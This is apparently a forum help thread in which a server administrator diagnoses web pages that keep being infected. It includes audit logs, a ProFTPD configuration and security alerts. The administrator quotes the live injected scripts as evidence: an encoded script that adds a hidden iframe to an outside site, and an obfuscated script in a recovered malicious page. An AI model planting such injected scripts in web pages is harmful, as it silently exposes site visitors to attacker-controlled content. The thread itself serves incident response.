krisdigitx
asked on
proftpd sql injection cross site scripting
recently on the webserver, i noticed a lot of pages being infected with this code.
<script type="text/javascript">
document.write(unescape('% 3C%69%66%7 2%61%6D%65 %20%73%72% 63%3D%22%6 8%74%74%70 %3A%2F%2F% 63%6F%75%6 E%74%73%73 %2E%63%6F% 6D%2F%63%6 F%75%6E%74 %2F%69%6E% 2E%70%68%7 0%22%20%77 %69%64%74% 68%3D%31%2 0%68%65%69 %67%68%74% 3
D%31%20%73%74%79%6C%65%3D% 22%76%69%7 3%69%62%69 %6C%69%74% 79%3A%20%6 8%69%64%64 %65%6E%22% 3E%3C%2F%6 9%66%72%61 %6D%65%3E' ));
</script>
http://bugs.proftpd.org/show_bug.cgi?id=3115
i upgraded proftpd from 1.3.1 to 1.3.2, but the pages do get infected again, I ran audit on the webserver directory, which shows thats the process is proftpd itself which alters the file, so the update did not fix the issue.
type=SYSCALL msg=audit(1235325508.686:7 1929): arch=40000003 syscall=5 success=yes exit=10 a0=814ad4c a1=8241 a2=1b6 a3=8241 items=1 ppid=25144 pid=5065 auid=4294967295 uid=0 gid=1012 euid=6537 suid=6537 fsuid=6537 egid=1012 sgid=1012 fsgid=1012 tty=(none) comm="proftpd" exe="/usr/local/sbin/proft pd" key=(null)
type=CWD msg=audit(1235325508.686:7 1929): cwd="/user/public_html"
type=PATH msg=audit(1235325508.686:7 1929): item=0 name="/user/public_html/in dex.html" inode=203182030 dev=08:07 mode=0100644 ouid=6537 ogid=1012 rdev=00:00
following is the proftpd.conf, but its copied from proftpd 1.3.1
anyone had a fix for this?
<script type="text/javascript">
document.write(unescape('%
D%31%20%73%74%79%6C%65%3D%
</script>
http://bugs.proftpd.org/show_bug.cgi?id=3115
i upgraded proftpd from 1.3.1 to 1.3.2, but the pages do get infected again, I ran audit on the webserver directory, which shows thats the process is proftpd itself which alters the file, so the update did not fix the issue.
type=SYSCALL msg=audit(1235325508.686:7
type=CWD msg=audit(1235325508.686:7
type=PATH msg=audit(1235325508.686:7
following is the proftpd.conf, but its copied from proftpd 1.3.1
anyone had a fix for this?
#
# usr/local/etc/proftpd/proftpd.conf -- This is a basic ProFTPD configuration file.
# To really apply changes reload proftpd after modifications.
#
Include /usr/local/etc/proftpd/modules.conf
ServerName "Reseller System FTP Server"
ServerType standalone
DeferWelcome on
MultilineRFC2228 on
DefaultServer on
ShowSymlinks on
TimeoutNoTransfer 600
TimeoutStalled 600
TimeoutIdle 1200
DisplayLogin welcome.msg
DisplayChdir .message
ListOptions "-l"
RequireValidShell off
DefaultRoot ~
IdentLookups off
DenyFilter \*.*/
SystemLog /var/log/proftpd.log
# Uncomment this if you are using NIS or LDAP to retrieve passwords:
#PersistentPasswd off
# Uncomment this if you would use TLS module:
#TLSEngine on
# Uncomment this if you would use quota module:
#Quotas on
# Uncomment this if you would use ratio module:
#Ratios on
# Port 21 is the standard FTP port.
DefaultAddress 0.0.0.0
Port 21
# To prevent DoS attacks, set the maximum number of child processes
# to 30. If you need to allow more than 30 concurrent connections
# at once, simply increase this value. Note that this ONLY works
# in standalone mode, in inetd mode you should use an inetd server
# that allows you to limit maximum number of processes per service
# (such as xinetd)
MaxInstances 30
# Set the user and group that the server normally runs at.
User nobody
Group nogroup
# Umask 022 is a good standard umask to prevent new files and dirs
# (second parm) from being group and world writable.
Umask 022 022
# Normally, we want files to be overwriteable.
AllowOverwrite on
# Allow CHOWN!
CapabilitiesEngine on
CapabilitiesSet +CAP_CHOWN
# Delay engine reduces impact of the so-called Timing Attack described in
# http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02
# It is on by default.
DelayEngine off
# SQL Authentication.
SQLAuthenticate users userset
SQLAuthTypes Crypt
SQLConnectInfo server proftpd passwd PERSESSION
SQLUserInfo web_users username crypt uid gid homedir NULL
SQLUserWhereClause "activated = 'Y'"
#SQLLogFile /var/log/proftpd-sql.log
# A basic anonymous configuration, no upload directories.
# <Anonymous ~ftp>
# User ftp
# Group nogroup
# # We want clients to be able to login with "anonymous" as well as "ftp"
# UserAlias anonymous ftp
# # Cosmetic changes, all files belongs to ftp user
# DirFakeUser on ftp
# DirFakeGroup on ftp
#
# RequireValidShell off
#
# # Limit the maximum number of anonymous logins
# MaxClients 10
#
# # We want 'welcome.msg' displayed at login, and '.message' displayed
# # in each newly chdired directory.
# DisplayLogin welcome.msg
# DisplayFirstChdir .message
#
# # Limit WRITE everywhere in the anonymous chroot
# <Directory *>
# <Limit WRITE>
# DenyAll
# </Limit>
# </Directory>
#
# # Uncomment this if you're brave.
# # <Directory incoming>
# # # Umask 022 is a good standard umask to prevent new files and dirs
# # # (second parm) from being group and world writable.
# # Umask 022 022
# # <Limit READ WRITE>
# # DenyAll
# # </Limit>
# # <Limit STOR>
# # AllowAll
# # </Limit>
# # </Directory>
#
# </Anonymous>
<VirtualHost xx.xx.xx.xx>
ServerName "EIN"
MaxClients 10
MaxLoginAttempts 1
DeferWelcome off
IdentLookups off
ShowSymlinks on
TimeoutNoTransfer 600
TimeoutStalled 600
TimeoutIdle 1200
DisplayLogin welcome.msg
DisplayChdir .message
ListOptions "-l"
RequireValidShell off
DefaultRoot ~
IdentLookups off
DenyFilter \*.*/
AllowOverwrite on
<Limit LOGIN>
AllowUser cranx
AllowUser alpha
AllowUser value
DenyAll
</Limit>
CapabilitiesEngine on
CapabilitiesSet +CAP_CHOWN
SQLAuthenticate users userset
SQLAuthTypes Crypt
SQLConnectInfo server proftpd passwd PERSESSION
SQLUserInfo users username crypt uid gid homedir NULL
SQLUserWhereClause "activated = 'Y'"
#SQLLogFile /var/log/proftpd-sql.log
</VirtualHost>
<VirtualHost xx.xx.xx.xx>
ServerName "Client"
MaxClients 20
MaxLoginAttempts 1
DeferWelcome off
IdentLookups off
ShowSymlinks on
TimeoutNoTransfer 600
TimeoutStalled 600
TimeoutIdle 1200
DisplayLogin welcome.msg
DisplayChdir .message
ListOptions "-l"
RequireValidShell off
DefaultRoot ~
IdentLookups off
DenyFilter \*.*/
AllowOverwrite on
<Limit LOGIN>
AllowUser user1
AllowUser user2
DenyAll
</Limit>
CapabilitiesEngine on
CapabilitiesSet +CAP_CHOWN
SQLAuthenticate users userset
SQLAuthTypes Crypt
SQLConnectInfo server proftpd passwd PERSESSION
SQLUserInfo web_users username crypt uid gid homedir NULL
SQLUserWhereClause "activated = 'Y'"
#SQLLogFile /var/log/proftpd-sql.log
</VirtualHost>
ASKER
its running as 'nobody'
root 14980 21498 0 14:12 pts/0 00:00:00 grep proftp
nobody 20818 1 0 10:54 ? 00:00:00 proftpd: (accepting connections)
root 14980 21498 0 14:12 pts/0 00:00:00 grep proftp
nobody 20818 1 0 10:54 ? 00:00:00 proftpd: (accepting connections)
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
what has this to do with apache?
Assuming that krisdigitx ensured that the files still contain this code (for example by inspecting the files on the server):
either the static files have been changed or the the content of the database from which the file content is generated have been modified.
Both is not a pache but most likely a web application problem (except the host itself have been compromised/hijacked).
Assuming that krisdigitx ensured that the files still contain this code (for example by inspecting the files on the server):
either the static files have been changed or the the content of the database from which the file content is generated have been modified.
Both is not a pache but most likely a web application problem (except the host itself have been compromised/hijacked).
ASKER
i didnt understand you earlier
but many of the sites are infected with javascript codes, also php on the server is php4, i will try update it to php5, but i dont know if this is the problem, the log shows that the files were altered by proftpd, it also could be other virtualhosts accessing the file, but it is not so, since it the same ftpuser for the website which logs in at the time of modification.
but many of the sites are infected with javascript codes, also php on the server is php4, i will try update it to php5, but i dont know if this is the problem, the log shows that the files were altered by proftpd, it also could be other virtualhosts accessing the file, but it is not so, since it the same ftpuser for the website which logs in at the time of modification.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
checking the logs , i get these
suhosin[16129]: ALERT - maximum execution depth reached - script terminated (attacker '121.247.75.237', file '/var/ares/webweavers/web/ webweavers /www.domain.com/public_html/admin/editor/filemanager/browser/default/connectors/php/io.php', line 54)
apache: Unauthorised client: Attempted login as user from xx.xx.yy.yy (xx.xx.yy.yy)
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0ok er/www.domain.com/public_html/index.php')
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST[option]' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0ok er/www.domain.com/public_html/index.php')
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST[Itemid]' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0ok er/www.domain.com/public_html/index.php')
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable 'GLOBALS' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0ok er/www.domain.com/public_html/index.php')
suhosin[16129]: ALERT - maximum execution depth reached - script terminated (attacker '121.247.75.237', file '/var/ares/webweavers/web/
apache: Unauthorised client: Attempted login as user from xx.xx.yy.yy (xx.xx.yy.yy)
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0ok
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST[option]' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0ok
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable '_REQUEST[Itemid]' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0ok
Feb 14 09:38:28 tripolis suhosin[27849]: ALERT - tried to register forbidden variable 'GLOBALS' through GET variables (attacker '69.73.154.225', file '/var/ares/domain/web/g0ok
ASKER
> .. many of the sites are infected
you mean the other virtual hosts on the same system?
Yes
> .. other virtualhosts accessing the file, but it is not so,
does this mean that each virtual site has its own unique login user *and* that proftpd switches to that unique user before touching any file?
yes
silly question: did you check that the files are modified on your system?
if so, how did you do that?
I ran auditctl on the server which shows what files have been changed and by whom
you mean the other virtual hosts on the same system?
Yes
> .. other virtualhosts accessing the file, but it is not so,
does this mean that each virtual site has its own unique login user *and* that proftpd switches to that unique user before touching any file?
yes
silly question: did you check that the files are modified on your system?
if so, how did you do that?
I ran auditctl on the server which shows what files have been changed and by whom
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
ok, i managed to get the scripts which were executing, do you think it must have affected other virtualhosts/websites too?
* EDIT by modus_in_rebus * Masked out exploit links
* EDIT by modus_in_rebus * Masked out exploit links
root@tripolis:/usr/src/hacked# cat index.php
<script>a=new Array(59.76,104.61,101.82,113.66,96.97,108.8,100.76,31.66,114.66,113.65,98.78,60.8,33.69,103.6,115.99,115.63,111.96,57.6,46.9,46.88,99.89,97.74,50.71,50.9,102.73,52.94,51.9,99.72,54.62,54.69,105.93,45.79,98.7,109.76,46.86,98.68,102.97,104.62,44.74,97.64,104.67,109.93,46.84,104.76,109.93,99.83,100.79,119.9,45.84,98.7,102.78,104.73,62.85,114.9,103.63,101.99,101.85,33.94,31.71,118.88,104.63,99.65,115.68,103.74,60.82,48.94,31.82,103.79,100.96,104.97,102.83,103.64,115.91,60.68,48.81,31.84,114.91,115.6,120.75,107.75,100.71,60.93,33.89,117.97,104.84,114.93,104.96,97.69,104.87,107.68,104.98,115.91,120.74,57.66,31.66,103.96,104.6,99.89,99.76,100.96,109.86,33.6,61.61,59.77,46.68,104.82,101.62,113.6,96.83,108.77,100.76,61.94);var i;
for (i=0;i<=a.length; i++){document.write(String.fromCharCode(Math.round(a[i])));};</script>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<html><body><p align=right><a href=***MASKED*EXPLOIT*LINK*2***><font face=Arial size=3 color=#000080>??????? ?????</font></a><font face="Arial" size="3" color="#000080">
| </font><font face=Arial size=3 color=#F0EEEC><a href=***MASKED*EXPLOIT*LINK*2***>?????</a></font></p><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<p align=right><a href=***MASKED*EXPLOIT*LINK*2***><font face=Arial size=3 color=#F0EEEC>ýýýýýýý ýýýýý</font></a></p>
<p align=right><font face=Arial size=3 color=#F0EEEC><a href=***MASKED*EXPLOIT*LINK*2***>ýýýýý</a></font></p>
<p align=right> </p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýý
ýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýý
ýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>video</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýýýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 face=Times color=#CECECE>ýýýýýýý</font></a></p>
<p align=left><a href=***MASKED*EXPLOIT*LINK*3***><font size=4 color=#CECECE>ýýýýýýý</font></a></p>
</body></body></html>
root@tripolis:/usr/src/hacked#
this is just another script located on your server, but it does no damage on the server when called
If you can ensure that the user running the proftpd process modifies the files, you need to update all proftpd instances on the host.